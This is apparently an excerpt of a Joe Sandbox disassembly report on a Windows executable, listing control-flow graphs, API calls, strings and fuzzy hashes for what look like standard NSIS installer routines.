                                                                                      • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 581 405cb6-405cba 577->581 579 405b42-405b44 578->579 580 405b53-405b63 call 4063e8 578->580 582 405c64-405c69 579->582 583 405b4a-405b4d 579->583 587 405b72-405b73 call 405d09 580->587 588 405b65-405b70 lstrcatW 580->588 582->581 586 405c6b-405c6e 582->586 583->580 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->581 590->581 598 405c82-405c96 call 405cbd call 405ab2 590->598 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 603 405bdd-405bf1 call 4063e8 599->603 604 405bbf-405bc7 599->604 600->582 602 405c5f 600->602 602->582 616 405bf3-405bfb 603->616 617 405c08-405c13 call 405ab2 603->617 608 405bc9-405bd1 604->608 609 405c3c-405c4c FindNextFileW 604->609 608->603 613 405bd3-405bdb 608->613 609->599 612 405c52-405c53 FindClose 609->612 612->600 613->603 613->609 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->581 616->609 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->581 619->609 627->609 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->609 632->609
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B23
                                                                                      • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B6B
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B8E
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B94
                                                                                      • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405BA4
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                      • API String ID: 2035342205-3222569857
                                                                                      • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                      • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406736
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: xgB
                                                                                      • API String ID: 2295610775-399326502
                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 267 403eb5-403ec2 SetWindowPos 264->267 268 403ec8-403ecb 264->268 270 40408c-404091 call 4043ab 265->270 271 40404e-404051 265->271 266->265 267->268 273 403ee5-403eeb 268->273 274 403ecd-403edf ShowWindow 268->274 278 404096-4040b1 270->278 276 404053-40405e call 401389 271->276 277 404084-404086 271->277 279 403f07-403f0a 273->279 280 403eed-403f02 DestroyWindow 273->280 274->273 276->277 298 404060-40407f SendMessageW 276->298 277->270 283 40432c 277->283 284 4040b3-4040b5 call 40140b 278->284 285 4040ba-4040c0 278->285 289 403f0c-403f18 SetWindowLongW 279->289 290 403f1d-403f23 279->290 286 404309-40430f 280->286 288 40432e-404335 283->288 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 286->283 293 404311-404317 286->293 289->288 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->283 300 404319-404322 ShowWindow 293->300 294->295 301 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->301 295->286 296->288 302 403f59-403f5c 297->302 303 403f3c-403f53 SendMessageW IsWindowEnabled 297->303 298->288 300->283 331 404126-40412b 301->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 301->332 306 403f61-403f64 302->306 307 403f5e-403f5f 302->307 303->283 303->302 310 403f72-403f77 306->310 311 403f66-403f6c 306->311 309 403f8f-403f94 call 404338 307->309 309->296 312 403fad-403fc0 SendMessageW 310->312 314 403f79-403f7f 310->314 311->312 313 403f6e-403f70 311->313 312->296 313->309 317 403f81-403f87 call 40140b 314->317 318 403f96-403f9f call 40140b 314->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->278 351 4041ff-404201 340->351 351->278 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->286 356 404244-404271 CreateDialogParamW 353->356 354->283 355 404219-40421f 354->355 355->278 357 404225 355->357 356->286 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->283 358->283 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->286
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: (7B
                                                                                      • API String ID: 3282139019-3251261122
                                                                                      • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                      • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 379 403b5e-403b87 call 403dae call 405dc5 369->379 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->379 376->375 384 403c19-403c21 call 405dc5 379->384 385 403b8d-403b92 379->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 397 403bd8-403be4 lstrlenW 393->397 398 403bc8-403bd5 call 405cea 393->398 409 403ce7-403cf2 call 403dae 395->409 410 403cdf-403ce2 395->410 399 403da4 396->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->400 404 403be6-403bf4 lstrcmpiW 397->404 405 403c0c-403c14 call 405cbd call 4063e8 397->405 398->397 403 403da6-403dad 399->403 400->395 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 413 403c02-403c04 408->413 414 403c06-403c07 call 405d09 408->414 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 413->405 413->414 414->405 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->410 429 403d91-403d98 call 40140b 425->429 426->399 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->410 432->433 437 403d70-403d79 call 403a28 433->437 437->403
                                                                                      APIs
                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                      • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93420,00435000,00000000), ref: 00403B59
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-1350935784
                                                                                      • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                      • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                      • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                      • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 462 403143-40314b call 402e8e 456->462 463 402fec-402ff2 456->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 466 403072-403076 463->466 467 402ff4-40300c call 405e99 463->467 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 471 403078-40307e call 402e8e 466->471 472 40307f-403085 466->472 467->472 486 40300e-403015 467->486 471->472 479 403087-403095 call 4068b5 472->479 480 403098-4030a2 472->480 479->480 480->452 480->453 486->472 490 403017-40301e 486->490 488->460 488->465 490->472 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->472 495 403029-403030 493->495 495->472 497 403032-403052 495->497 497->460 500 403058-40305c 497->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 504 4031a1 501->504 505 4031a7-4031ac 501->505 502->472 506 40306e-403070 502->506 503->452 503->502 504->505 507 4031ad-4031b3 505->507 506->472 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\v4nrZtP7K2.exe,00000400), ref: 00402F60
                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\v4nrZtP7K2.exe,80000000,00000003), ref: 00405EE2
                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\v4nrZtP7K2.exe,C:\Users\user\Desktop\v4nrZtP7K2.exe,80000000,00000003), ref: 00402FA9
                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\v4nrZtP7K2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-358818865
                                                                                      • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                      • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 549 406613-406619 536->549 537->549 542 406500-406502 538->542 543 406503-406505 538->543 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->538 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 560 406534-40653b call 40640a 548->560 561 4065ce-4065d1 548->561 549->533 553 40661b 549->553 556 4065c1-4065c3 550->556 557 406558-406566 GetWindowsDirectoryW 550->557 555 4065c5-4065c9 551->555 554 4065de-4065e4 call 40667c 553->554 554->533 555->554 562 4065cb 555->562 556->555 559 406568-406572 556->559 557->556 567 406574-406577 559->567 568 40658c-4065a2 SHGetSpecialFolderLocation 559->568 560->555 561->554 565 4065d3-4065d9 lstrcatW 561->565 562->561 565->554 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->555 571->572 572->556 573->555 573->568
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2033812125.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2033762059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033833848.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033855611.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_v4nrZtP7K2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-1230650788
                                                                                      • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                      • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                      • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                      • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
